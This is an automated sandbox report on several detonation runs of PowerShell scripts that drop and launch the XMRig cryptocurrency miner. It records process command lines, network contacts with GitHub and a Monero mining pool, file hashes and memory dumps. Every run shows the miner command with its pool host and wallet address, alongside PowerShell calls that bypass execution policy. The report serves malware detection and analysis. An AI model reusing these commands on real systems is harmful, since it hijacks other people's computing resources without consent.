Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/344-0-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/344-5-0x000001FFC94A0000-0x000001FFC94C2000-memory.dmp

memory/344-6-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/344-9-0x000001FFE1BA0000-0x000001FFE1C16000-memory.dmp

memory/344-10-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_crtdyw1o.nsn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/344-25-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/344-48-0x000001FFE18F0000-0x000001FFE1902000-memory.dmp

memory/344-61-0x000001FFC94E0000-0x000001FFC94EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral19

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:13

Platform

win10v2004-20240611-en

Max time kernel

1795s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_etub3e0t.hcp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral20

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:13

Platform

win11-20240611-en

Max time kernel

1798s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5iaxiemm.wa3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral30

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:25

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jw4uc2si.pbo.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zczw0pms.v2u.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


memory/3868-148-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-149-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-150-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-151-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-152-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-153-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-154-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-155-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-156-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

memory/3868-157-0x00007FF6A4E60000-0x00007FF6A5A93000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:01

Platform

win11-20240419-en

Max time kernel

1791s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/3872-0-0x00007FF84EE23000-0x00007FF84EE25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g0oxev03.nw2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3872-7-0x00000213C4D80000-0x00000213C4DA2000-memory.dmp

memory/3872-10-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

memory/3872-11-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

memory/3872-12-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

memory/3872-14-0x00000213C52A0000-0x00000213C52B2000-memory.dmp

memory/3872-15-0x00000213C5190000-0x00000213C519A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1976-46-0x000001E42D530000-0x000001E42D550000-memory.dmp

memory/1976-47-0x000001E42D570000-0x000001E42D590000-memory.dmp

memory/1976-48-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/3872-49-0x00007FF84EE23000-0x00007FF84EE25000-memory.dmp

memory/3872-50-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

memory/1976-52-0x000001E4C14E0000-0x000001E4C1500000-memory.dmp

memory/1976-53-0x000001E42D590000-0x000001E42D5B0000-memory.dmp

memory/1976-51-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-54-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-55-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-56-0x000001E4C14E0000-0x000001E4C1500000-memory.dmp

memory/1976-57-0x000001E42D590000-0x000001E42D5B0000-memory.dmp

memory/1976-58-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-59-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-60-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-61-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-62-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-63-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-64-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-65-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-66-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-67-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-68-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-69-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-70-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-71-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-72-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-73-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-74-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-75-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-76-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-77-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-78-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-79-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-80-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-81-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-82-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-83-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-84-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-85-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-86-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-87-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-88-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-89-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-90-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-91-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-92-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-93-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-94-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-95-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-96-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-97-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-98-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-99-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-100-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-101-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-102-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-103-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-104-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-105-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-106-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-107-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-108-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-109-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-110-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-111-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-112-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-113-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-114-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-115-0x00007FF755650000-0x00007FF756283000-memory.dmp

memory/1976-116-0x00007FF755650000-0x00007FF756283000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:03

Platform

win11-20240419-en

Max time kernel

1800s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
